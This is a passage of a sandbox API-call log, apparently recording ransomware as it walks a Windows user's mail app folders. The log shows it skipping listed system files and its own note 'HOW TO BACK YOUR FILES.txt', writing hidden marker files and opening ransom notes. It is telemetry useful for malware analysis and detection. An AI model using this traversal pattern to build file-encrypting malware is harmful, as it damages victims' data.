lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3de35df, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf1aae2a1, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xef417781, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102850 [0063.650] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.650] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.650] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.650] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.650] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3de35df, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf1aae2a1, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xef417781, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.650] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.650] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.650] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.650] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.650] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.650] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef417781, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef417781, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef43d73d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.650] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.650] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.650] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe3e55cfc, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x384e8f13, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x384e8f13, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0063.651] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.651] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.651] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0063.651] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0063.651] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0063.651] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0063.651] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0063.651] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0063.651] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0063.651] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0063.651] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0063.651] lstrcpyW (in: lpString1=0x130ebea, lpString2="AC" | out: lpString1="AC") returned="AC" [0063.651] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122260 [0063.651] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb8) returned 0x122cc0 [0063.651] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122268 | out: ListHead=0xf68b0, ListEntry=0x122268) returned 0x122028 [0063.651] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3de35df, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd18c1e3b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe3de35df, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0063.651] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.651] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.651] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0063.651] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0063.651] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0063.651] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0063.651] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0063.651] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0063.651] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0063.651] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0063.651] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0063.651] lstrcpyW (in: lpString1=0x130ebea, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0063.651] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222e0 [0063.651] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc2) returned 0x116860 [0063.651] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222e8 | out: ListHead=0xf68b0, ListEntry=0x1222e8) returned 0x122268 [0063.651] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3de35df, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd18c2664, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe3de35df, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0063.651] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.651] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.651] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0063.652] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0063.652] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0063.652] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0063.652] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0063.652] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0063.652] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0063.652] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0063.652] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0063.652] lstrcpyW (in: lpString1=0x130ebea, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0063.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222a0 [0063.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc8) returned 0x116930 [0063.652] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222a8 | out: ListHead=0xf68b0, ListEntry=0x1222a8) returned 0x1222e8 [0063.652] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3de35df, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x2f13411f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2f23f1b3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0063.652] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.652] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.652] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0063.652] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0063.652] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0063.652] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0063.652] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0063.652] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0063.652] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0063.652] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0063.652] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0063.652] lstrcpyW (in: lpString1=0x130ebea, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0063.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fa0 [0063.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc8) returned 0x116ad0 [0063.652] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fa8 | out: ListHead=0xf68b0, ListEntry=0x121fa8) returned 0x1222a8 [0063.652] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3de35df, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd192c093, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe3de35df, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0063.652] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.652] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.652] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0063.652] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0063.652] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0063.652] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0063.652] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0063.653] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0063.653] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0063.653] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0063.653] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0063.653] lstrcpyW (in: lpString1=0x130ebea, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0063.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0063.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xcc) returned 0x108760 [0063.653] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x121fa8 [0063.653] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3de35df, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7133ee1b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x7133ee1b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0063.653] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.653] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.653] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0063.653] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0063.653] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0063.653] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0063.653] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0063.653] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0063.653] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0063.653] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0063.653] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0063.653] lstrcpyW (in: lpString1=0x130ebea, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0063.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122280 [0063.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc4) returned 0x1166c0 [0063.653] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122288 | out: ListHead=0xf68b0, ListEntry=0x122288) returned 0x1222c8 [0063.653] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefc6e47f, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xefc6e47f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xefc6e47f, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0063.653] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.653] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.653] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0063.653] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0063.653] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0063.653] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0063.653] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0063.653] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0063.653] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0063.654] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0063.654] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0063.654] lstrcpyW (in: lpString1=0x130ebea, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0063.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122000 [0063.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xce) returned 0x108688 [0063.654] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122008 | out: ListHead=0xf68b0, ListEntry=0x122008) returned 0x122288 [0063.654] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3de35df, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x51a15eeb, ftLastAccessTime.dwHighDateTime=0x1d336da, ftLastWriteTime.dwLowDateTime=0x51a15eeb, ftLastWriteTime.dwHighDateTime=0x1d336da, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0063.654] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.654] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.654] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0063.654] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0063.654] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0063.654] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0063.654] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0063.654] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0063.654] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0063.654] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0063.654] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0063.654] lstrcpyW (in: lpString1=0x130ebea, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0063.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122180 [0063.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc6) returned 0x1165f0 [0063.654] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122188 | out: ListHead=0xf68b0, ListEntry=0x122188) returned 0x122008 [0063.654] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3de35df, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x51a15eeb, ftLastAccessTime.dwHighDateTime=0x1d336da, ftLastWriteTime.dwLowDateTime=0x51a15eeb, ftLastWriteTime.dwHighDateTime=0x1d336da, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0063.654] FindClose (in: hFindFile=0x102850 | out: hFindFile=0x102850) returned 1 [0063.654] lstrcpyW (in: lpString1=0x130ebea, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.654] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.655] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.655] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.656] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.656] CloseHandle (hObject=0x278) returned 1 [0063.656] CloseHandle (hObject=0x298) returned 1 [0063.656] GetCurrentThreadId () returned 0xd98 [0063.656] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122188 [0063.656] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\TempState" [0063.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1165f0 | out: hHeap=0xe0000) returned 1 [0063.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122180 | out: hHeap=0xe0000) returned 1 [0063.656] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\TempState" [0063.656] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\TempState\\" [0063.656] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" [0063.656] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.658] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.661] FlushFileBuffers (hFile=0x298) returned 1 [0063.661] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.662] CloseHandle (hObject=0x298) returned 1 [0063.662] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\TempState") returned 98 [0063.662] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.662] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3de35df, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x51a15eeb, ftLastAccessTime.dwHighDateTime=0x1d336da, ftLastWriteTime.dwLowDateTime=0xef43d73d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102810 [0063.662] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.662] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.662] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.662] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.662] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3de35df, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x51a15eeb, ftLastAccessTime.dwHighDateTime=0x1d336da, ftLastWriteTime.dwLowDateTime=0xef43d73d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.663] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.663] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.663] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.663] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.663] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.663] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef43d73d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef43d73d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef43d73d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.663] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.663] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.663] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef43d73d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef43d73d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef43d73d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.663] FindClose (in: hFindFile=0x102810 | out: hFindFile=0x102810) returned 1 [0063.663] lstrcpyW (in: lpString1=0x130ebfe, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.663] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\tempstate\\how to back your files.txt"), 